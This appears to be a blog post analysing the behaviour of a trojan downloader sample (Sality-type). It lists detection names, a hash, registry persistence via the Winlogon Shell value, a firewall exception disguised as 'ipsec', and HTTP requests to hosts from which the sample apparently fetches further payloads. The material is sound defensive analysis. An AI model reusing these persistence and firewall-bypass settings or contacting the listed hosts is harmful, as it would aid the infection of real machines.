I have receive a suspcious file from my colleague this morning and done a simple behaviour analysis on it.
Analysis Report:
##############
Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky,F-Secure),
On the VirusTotal website, 36 out of 40 AV detected it (
details).
Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"
The above registry setting add the malware into the Windows firewall rules and name it as "ipsec" (shown above).3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00
5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01
6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."
7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"
Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010
2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011
3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"
4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""
5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039
6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A
7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039
8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A
Files modifed:==========
1> C:\Documents and Settings\Owner\Cookies\index.dat
2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
4> C:\WINDOWS\system.ini
5> C:\WINDOWS\system32\config\software.LOG
6> C:\WINDOWS\system32\config\system.LOG
Other behaviours:=============
System conecting to:
1> peskostruikaz.com:80
The following HTTP request found:
" GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache"2> johnsonbodyshop.com:80
No request after initial handshake.
3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57Host: shopatforgetmenot.comCache-Control: no-cache"
4> corporateshelters.com:80
No request after initial handshake.
Seems like the malware trying to download more malicious payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".